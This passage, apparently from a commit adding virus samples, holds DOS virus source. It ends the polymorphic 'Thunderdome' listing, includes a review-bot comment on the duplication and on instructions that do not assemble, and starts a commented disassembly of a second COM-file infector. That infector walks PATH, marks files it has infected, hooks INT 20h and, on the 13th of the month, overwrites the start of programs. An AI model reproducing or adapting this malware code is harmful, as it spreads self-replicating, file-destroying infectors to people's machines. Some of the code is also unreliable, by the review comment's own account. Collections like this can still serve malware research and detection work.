sub cx,cx
cwd
call dos
sub ax,3
mov cs:jump[1],ax
Add Ax,Offset Crypt+103h
Mov S_1[1],Ax
Mov S_2[1],Ax
Mov S_3[4],Ax
Mov S_4[4],Ax
Call GenPoly
mov ah,40h
push cs
pop ds
lea dx,coder
mov cx,virlen
call dos
mov ax,4200h
xor cx,cx
cwd
call dos
mov ah,40h
lea dx,jump
mov cx,3
call dos
or cs:fdat,01fh
close: mov ax,5701h
mov cx,cs:fdat
mov dx,cs:fdat[2]
call dos
done: mov ah,3eh
call dos
pop ds
pop dx
push dx
push ds
mov ax,4301h
mov cx,fatr
call dos
error: pop ds
pop dx
endint: pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp d ptr cs:[old21]
GenPoly: Xor Byte Ptr [Loopje],2
Xor Ax,Ax
Mov Es,Ax
Mov Ax,Es:[46ch]
Mov Es,Cs
Push Ax
And Ax,07ffh
Add Ax,CryptLen
Mov S_1[4],Ax
Mov S_2[4],Ax
Mov S_3[1],Ax
Mov S_4[1],Ax
Doit: Pop Ax
Push Ax
And Ax,3
Shl Ax,1
Mov Si,Ax
Mov Ax,W Table[Si]
Mov Si,Ax
Lea Di,decr
Movsw
Movsw
Movsw
Movsw
Pop Ax
Stosb
Movsb
Mov Dl,Al
Lea Si,Decr
Lea Di,Coder
Mov Cx,DecrLen
Rep Movsb
Lea Si,Crypt
Mov Cx,CryptLen
Encrypt: Lodsb
Xor Al,Dl
Stosb
Loop Encrypt
Cmp Dl,0
Je Fuckit
Ret
FuckIt: Lea Si,Encr0
Lea Di,Coder
Mov Cx,Encr0Len
Rep Movsb
Mov Ax,Cs:jump[1]
Add Ax,Encr0Len+2
Mov Cs:jump[1],Ax
Ret
Db 13,10,'Created in Holland, released near Bolzano/Italy.'
Db 13,10,'This virus is made to test the spreading rate of viruses in Italy. It is not'
Db 13,10,'ment to be destructive, however, some programs might not work anymore,'
Db 13,10,'because of CRC-checking. I am sorry if I accidentally corrupted one of your'
Db 13,10,'programs, but HEY! That is how life is, eh? Try to get our virus collection!'
Db 13,10,'and try TPE, or DMU (another one, more compact and also very complex!).'
Db 13,10,'Greetings go to all other virus writers!'
Table DW Offset S_1,Offset S_2,Offset S_3,Offset S_4
S_1: Lea Si,0
Mov Cx,0
DB 80h,34h
Inc Si
S_2: Lea Di,0
Mov Cx,0
DB 80h,35h
Inc Di
S_3: Mov Cx,0
Lea Si,0
DB 80h,34h
Inc Si
S_4: Mov Cx,0
Lea Di,0
DB 80h,35h
Inc Di
Db '[ "Thunderdome" virus by '
Encr0 Db 'John Tardy'
Encr0Len Equ $-Encr0
Db ' / TridenT ]'
getdta: pop si
pushf
push ax
push bx
push es
mov ah,2fh
call dos
jmp short si
FindFCB: call DOS
cmp al,0
jne Ret1
call getdta
cmp byte ptr es:[bx],-1
jne FCBOk
add bx,8
FCBOk: mov al,es:[bx+16h]
and al,1fh
cmp al,1fh
jne FileOk
sub word ptr es:[bx+1ch],Virlen
sbb word ptr es:[bx+1eh],0
jmp short Time
Find: call DOS
jc Ret1
call getdta
mov al,es:[bx+16h]
and al,1fh
cmp al,1fh
jne FileOk
sub word ptr es:[bx+1ah],VirLen
sbb word ptr es:[bx+1ch],0
Time: xor byte ptr es:[bx+16h],10h
FileOk: pop es
pop bx
pop ax
popf
Ret1: retf 2
dos: pushf
call dword ptr cs:[old21]
ret
Org_prg dw 0cd90h
db 20h
fnam db 8 dup (0)
db '.'
db 3 dup (0)
db 0
fatr dw 0
fdat dw 0,0
jump db 0e9h,0,0
ResLen Equ ($-Decr)/10h
ParLen Equ (Reslen*2)+10h
CryptLen Equ $-Crypt
VirLen Equ $-Decr
Coder Equ $
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
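Review bot: This section repeats the preceding 403-line Thunderdome listing line for line — same `Org 0h`/`decr:` header, same `GenPoly`, same trailing BBS banner — so the commit appears to add one sample twice under different paths (the file names are not shown here, so this is inferred from the hunk contents). If the two are not distinct variants, one copy should be dropped; if both are kept, the second should open with a comment naming the other file and the reason, e.g. `; NOTE: identical to the other Thunderdome listing in this commit — kept for …`. The non-assembling `mov ds,cs` / `Mov Es,Cs` instructions and the undefined `d`/`W` aliases in the first copy are present here as well.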

@ -0,0 +1,785 @@
; Start disassembly
DATA_1E EQU 64H ; (761D:0064=0)
DATA_2E EQU 66H ; (761D:0066=0)
DATA_3E EQU 68H ; (761D:0068=0)
DATA_10E EQU 4F43H ; (761D:4F43=0)
DATA_11E EQU 504DH ; (761D:504D=0)
SEG_A SEGMENT
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h
Time PROC FAR
start:
JMP Virus_Entry_Point ;
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Original Program without 1st three bytes... ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
DATA_5 DB 9987 DUP (90H)
MOV AH,4CH ;
MOV AL,DATA_2 ; Terminate to DOS with
INT 21H ; exitcode AL
DB 0
DATA_2 DB 0
DB 0
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Virus Entry Point ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Virus_Entry_Point:
JMP SHORT Set_Virus_Data_Point
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Set Virus Data Storage Point ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Set_Virus_Data_Point:
PUSH CX ; Store CX
MOV DX,2B2DH ;
MOV SI,DX ; SI points at start of
; virus data
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Get DTA Address ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
PUSH ES ; Store ES
MOV AH,2FH ; GET DTA address into
INT 21H ; ES:BX
MOV [SI],BX ; Store BX of DTA
MOV [SI+2],ES ; Store ES of DTA
POP ES ; Restore ES
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Set new DTA Address ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
MOV DX,4EH ;
ADD DX,SI ;
MOV AH,1AH ;
INT 21H ; Set new DTA to DS:DX
PUSH SI ; Store SI
CLD ; Clear direction
MOV DI,SI ;
ADD SI,0AH ;
ADD DI,81H ;
MOV CX,3 ; Move 3 bytes from source
REP MOVSB ; to destination (E9h, 45h
; 45h)
POP SI ; Restore SI
PUSH ES ; Store ES
PUSH SI ; Store SI
PUSH BX ; Store BX
MOV BX,2CH
MOV AX,[BX] ; Get Extra Segment?
POP BX ; Restore BX
MOV ES,AX
MOV DI,0
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Search for the PATH ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Search_For_Path:
POP SI ; Restore SI
PUSH SI ; Store SI
ADD SI,1AH ;
LODSB ; Load the 'M' into AL
MOV CX,8000H ;
REPNE SCASB ;
MOV CX,4 ;
Path_Loop:
LODSB ;
SCASB ;
JNZ Search_For_Path ;
LOOP Path_Loop ; Pitty, PATH not yet found.
POP SI ; Restore SI
POP ES ; Restore ES
MOV [SI+16H],DI ; Store address of PATH
MOV BX,SI ; Temp. Storage of SI
ADD SI,26H ;
MOV DI,SI ;
JMP SHORT Find_First_FileName
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Error:
CMP WORD PTR [SI+16H],0
JNE Set_Virus_Path ;
JMP Restore_Org_DTA ; Error occured. Restore
; original DTA,
; 1st three bytes and
; execute original
; program.
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Start Searching for PATH ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Set_Virus_Path:
PUSH DS ; Store Registers
PUSH SI
PUSH AX
PUSH ES
PUSH ES
POP DS ; DS=ES
PUSH BX
MOV BX,2CH
MOV AX,[BX]
POP BX ; Restore BX
MOV [SI+1FH],AX ;
MOV DI,SI ;
MOV AX,[DI+16H] ; Org.address of PATH
MOV SI,AX ;
MOV DS,[DI+1FH] ;
POP ES ;
POP AX ;
ADD DI,26H ;
Reached_EO_Path:
LODSB ; Get byte into AL
CMP AL,3BH ; Path Delimiter ';' reached?
JE Delimiter_Reached ; Yes
CMP AL,0 ; End of Path reached?
JE EO_Path_Reached ; Yes
STOSB ; Store byte in AL
JMP SHORT Reached_EO_Path ;
EO_Path_Reached:
MOV SI,0 ;
Delimiter_Reached:
POP BX ;
POP DS ;
MOV [BX+16H],SI ;
CMP BYTE PTR [DI-1],5CH ; Is the PATH closed by
; a backslash?
JE Find_First_FileName ; Yes
MOV AL,5CH ;
STOSB ; Place Backslash
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Find First Filename ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Find_First_FileName:
MOV [BX+18H],DI ; Store at which address
; the path starts
; BX=SI
MOV SI,BX ; Restore SI
ADD SI,10H ;
MOV CX,6 ;
REP MOVSB ; Set Search.Spec.
MOV SI,BX ; Restore SI
MOV AH,4EH ;
MOV DX,26H ;
ADD DX,SI ; Filename:= *.COM
MOV CX,3 ; Search Attributes:
; Read Only/Hidden
INT 21H ; Find 1st Filename to
; match with DS:DX
JMP SHORT Error_Handler ;
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Find Next Filename ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Find_Next_FileName:
MOV AH,4FH ;
INT 21H ; Find next Filename to
; match with DS:DX
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Error Handler ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Error_Handler:
JNC Check_Filelength ; Jump if carry=0, so
; no errors
JMP SHORT Error ; Carry Set, so error
; occured
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Check Filelength and look if file is already infected. ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Check_Filelength:
MOV AX,DS:DATA_1E[SI] ; (761D:0064=0)
AND AL,1FH
CMP AL,7
JE Find_Next_FileName ; File already infected.
CMP WORD PTR DS:DATA_3E[SI],0FA00H
; Is the length of the
; file more as FA00h bytes?
JA Find_Next_FileName ; Yes.
CMP WORD PTR DS:DATA_3E[SI],0F00H
; Is the length of the
; file less as 0F00h bytes?
JB Find_Next_FileName ; Yes
MOV DI,[SI+18H] ; Get address of path of virus
PUSH SI ; Store SI
ADD SI,6CH
Set_FileName:
LODSB ; Set up Filename for
STOSB ; infection.
CMP AL,0 ; End Of Filename Reached?
JNE Set_FileName ; No
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Set Temporary File attributes ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
POP SI ; Restore SI
MOV CX,[SI+63H] ;
MOV CH,0 ;
MOV [SI+8],CX ; Get File-Attributes
MOV AX,CX ;
MOV CX,0FFFEH ;
AND AX,CX ; Remove Read-Only Attribute
MOV CX,AX ;
MOV AX,4301H ;
MOV DX,26H ;
ADD DX,SI ;
INT 21H ; Set File-Attributes
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Open the File ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
MOV AX,3D02H ; Open the file for both
INT 21H ; reading and writing
JNC Give_Infection_Marker ; If no error occured...
JMP Set_FileAttributes_Back ; Error occured
Give_Infection_Marker:
MOV BX,AX
MOV CX,DS:DATA_2E[SI] ; (761D:0066=0)
MOV [SI+6],CX
MOV CX,DS:DATA_1E[SI] ; (761D:0064=0)
AND CL,0E0H
OR CL,7
MOV [SI+4],CX
JMP SHORT Get_Current_Time ; (2967)
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ This Part will be installed resident after hooking INT 20h ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
PUSHF ; Push flags
PUSH DS
PUSH ES
PUSH SS
PUSH AX
PUSH BX
PUSH DX
PUSH DI
PUSH SI
PUSH BP
MOV DX,43H
MOV AL,74H ; This will change the refesh
OUT DX,AL ; rate, thus slowing down the
MOV DX,41H ; PC. Every normal program-
MOV AL,8 ; termination by calling
OUT DX,AL ; INT 20h will call this
MOV AL,7 ; rourtine
OUT DX,AL ;
POP BP
POP SI
POP DI
POP DX
POP BX
POP AX
POP SS
POP ES
POP DS
POPF ; Pop flags
JMP CS:DATA_5 ; (761D:0253=9090H)
; JMP to org. INT 20h address
ADD [BX+SI],AL
ADD [BX+SI],AL
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Get Current Time ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Get_Current_Time:
PUSH AX ; Store all registers
PUSH BX
PUSH CX
PUSH DX
PUSH DS
PUSH ES
PUSH SI
PUSH DI
PUSH BP
MOV AH,2CH ; Get current time into CX:DX
INT 21H ; CX=hrs/min, DX=sec/hund.sec
CMP DL,32H ; Are we above 32/100 seconds?
JA Get_INT_F2_Vector ; Yes
JMP Start_Trigger_Check ; No
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Get Interrupt Vector of INT F2h ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Get_INT_F2_Vector:
MOV AH,35H ; Get the interrupt vector of
MOV AL,0F2H ; INT 0F2h into ES:BX
INT 21H ;
CMP BX,7777H ; Was INT F2 already hooked?
JNE Allocate_Memory ; No
JMP INT_F2_Already_Hooked ;
Allocate_Memory:
MOV AX,DS ;
DEC AX ;
MOV ES,AX ;
MOV BX,0 ;
CMP BYTE PTR ES:[BX],5AH ;
JE Memory_Already_Allocated
PUSH BX ;
MOV AH,48H ; Allocate 4096 16-byte-para-
MOV BX,0FFFFH ; graphs in memory. ???
INT 21H ;
CMP BX,5 ; Is the largest available
; 5 or higher?
JAE Again_Allocate_Memory ; Yes
JMP Start_Trigger_Check ; No
Again_Allocate_Memory:
MOV AH,48H ; Again allocate memory
INT 21H ;
POP BX ;
JNC Segment_Decrease ; If there was no error when
; allocating memory the last
; time
JMP Start_Trigger_Check ; If there was an error
Segment_Decrease:
DEC AX ; Decrease Segment of Allcated
; memory
MOV ES,AX ;
MOV BX,1 ;
MOV WORD PTR ES:[BX],0 ;
MOV BX,0 ;
CMP BYTE PTR ES:[BX],5AH ;
JE Memory_Allocated ;
JMP SHORT Start_Trigger_Check
NOP ;
Memory_Allocated:
MOV BX,3 ;
ADD AX,ES:[BX] ;
INC AX ;
MOV BX,12H ;
MOV ES:[BX],AX ;
Memory_Already_Allocated:
MOV BX,3 ;
MOV AX,ES:[BX] ;
SUB AX,5 ;
JC Start_Trigger_Check ; Jump if carry Set
MOV ES:[BX],AX ;
MOV BX,12H ;
SUB WORD PTR ES:[BX],5 ;
MOV ES,ES:[BX] ;
PUSH SI ; Store SI
SUB SI,1F2H ; SI points to the part
MOV DI,0 ; which must become
MOV CX,46H ; resident.
REP MOVSB ; Move the 46h bytes from
; [SI] to ES:[DI]
POP SI ; Restore SI
MOV BP,ES ;
PUSH CS ;
POP ES ; Restore ES
MOV AH,25H ; Hook interrupt F2h
MOV AL,0F2H ; New INT-vector will
MOV DX,7777H ; be DS:7777h
INT 21H ;
JMP SHORT Hook_INT_20h ; (2A10)
NOP
INT_F2_Already_Hooked:
JMP SHORT Start_Trigger_Check
NOP
Hook_INT_20h:
MOV AL,20H ;
MOV AH,35H ; Get the INT 20h Vector
INT 21H ; into ES:BX
MOV DX,ES ;
MOV ES,BP ;
PUSH SI ;
MOV AX,SI ;
SUB AX,1CAH ;
MOV DI,SI ;
SUB DI,1F2H ;
SUB AX,DI ;
MOV SI,AX ;
MOV ES:[SI],BX ;
ADD SI,2 ;
MOV ES:[SI],DX ;
SUB SI,4 ;
MOV ES:[SI],AX ;
POP SI ;
PUSH CS ;
POP ES ;
MOV AH,25H ; Install new INT 20h
MOV DS,BP ; vector to DS:DX
MOV DX,0 ; (=DS:00)
MOV AL,20H ;
INT 21H ;
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Start Trigger Check ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Start_Trigger_Check:
POP BP ; Restore Registers
POP DI
POP SI
POP ES
POP DS
POP DX
POP CX
POP BX
POP AX
MOV AH,2AH ; Get the current date
INT 21H ; CX=year, DX=mon/day
CMP DL,0DH ; Is it the 13th of the month?
JNE Start_Infecting_File ; No
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ It is the 13th of the Month... Select 1 out of 3 destructions ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
MOV AH,2CH ; Get current time
INT 21H ; CX=hrs/min, DX=sec/hund.sec
CMP DL,3CH ; Are we above 60/100 seconds?
JA Destruction_2 ; Yes
CMP DL,1EH ; Are we above 30/100 seconds?
JA Destruction_3 ; Yes
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Destruction Scheme 1: Place the following code at the begining of a ÛÛ
;ÛÛ file: MOV AH,00 ÛÛ
;ÛÛ INT 20h ÛÛ
;ÛÛ NOP ÛÛ
;ÛÛ ÛÛ
;ÛÛ When a file is executed with this code at the begining, the program ÛÛ
;ÛÛ will terminate at once with returning to DOS. ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
MOV DX,SI
ADD DX,21H
JMP SHORT Write_5_Destruction_Bytes
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Destruction Scheme 2: Place the following code at the begining of a ÛÛ
;ÛÛ file: HLT ÛÛ
;ÛÛ HLT ÛÛ
